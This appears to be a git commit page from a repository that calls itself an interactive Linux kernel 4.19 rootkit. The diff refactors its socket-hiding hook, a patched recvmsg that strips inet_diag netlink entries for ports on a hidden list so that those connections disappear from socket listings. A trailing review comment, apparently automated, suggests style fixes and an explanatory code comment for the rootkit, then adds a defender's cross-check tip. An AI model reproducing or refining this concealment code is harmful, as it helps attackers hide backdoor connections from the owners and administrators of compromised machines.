linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit bb9029d71dbd4fa5632e7a711f0281febeab1dfd
parent d1bafd4403cdd1befcd19458c7265cfb187ebb87
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 13 Dec 2020 04:49:00 +0100

refactors code

Diffstat:
Msrc/sockhide.c | 18++++++++----------
1 file changed, 8 insertions(+), 10 deletions(-)

diff --git a/src/sockhide.c b/src/sockhide.c
@@ -178,18 +178,16 @@ g7_recvmsg(struct pt_regs *pt_regs)
 int src = ntohs(((struct inet_diag_msg *)NLMSG_DATA(nh))->id.idiag_sport);
 int dst = ntohs(((struct inet_diag_msg *)NLMSG_DATA(nh))->id.idiag_dport);
- if (!(list_contains_port(&hidden_ports, src, -1)
- || list_contains_port(&hidden_ports, dst, -1)))
+ if (list_contains_port(&hidden_ports, src, -1)
+ || list_contains_port(&hidden_ports, dst, -1))
 {
- nh = NLMSG_NEXT(nh, len);
- continue;
- }
+ int alignment = NLMSG_ALIGN(nh->nlmsg_len);
+ for (i = 0; i < len; ++i)
+ ((char *)nh)[i] = ((char *)nh)[i + alignment];
- int alignment = NLMSG_ALIGN(nh->nlmsg_len);
- for (i = 0; i < len; ++i)
- ((char *)nh)[i] = ((char *)nh)[i + alignment];
-
- ret -= alignment;
+ ret -= alignment;
+ } else
+ nh = NLMSG_NEXT(nh, len);
 }
 return ret;
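Review bot: The rewritten branch in g7_recvmsg pairs a braced `if` body with an unbraced `else`, which Linux kernel coding style does not allow; it should read `} else {`, `nh = NLMSG_NEXT(nh, len);`, `}`. The branch also carries no comment, and anyone analysing this module would be helped by one such as `/* entry's source or destination port is in hidden_ports: overwrite it with the bytes that follow and shrink the length handed back to the caller */`. For defenders, the visible effect is that inet_diag replies appear to be altered before the hooked recvmsg returns, so socket listings obtained through this interface on an affected host should be cross-checked against a view from outside the host, such as network capture or hypervisor-side memory inspection. The enclosing loop and function start and end outside the hunk.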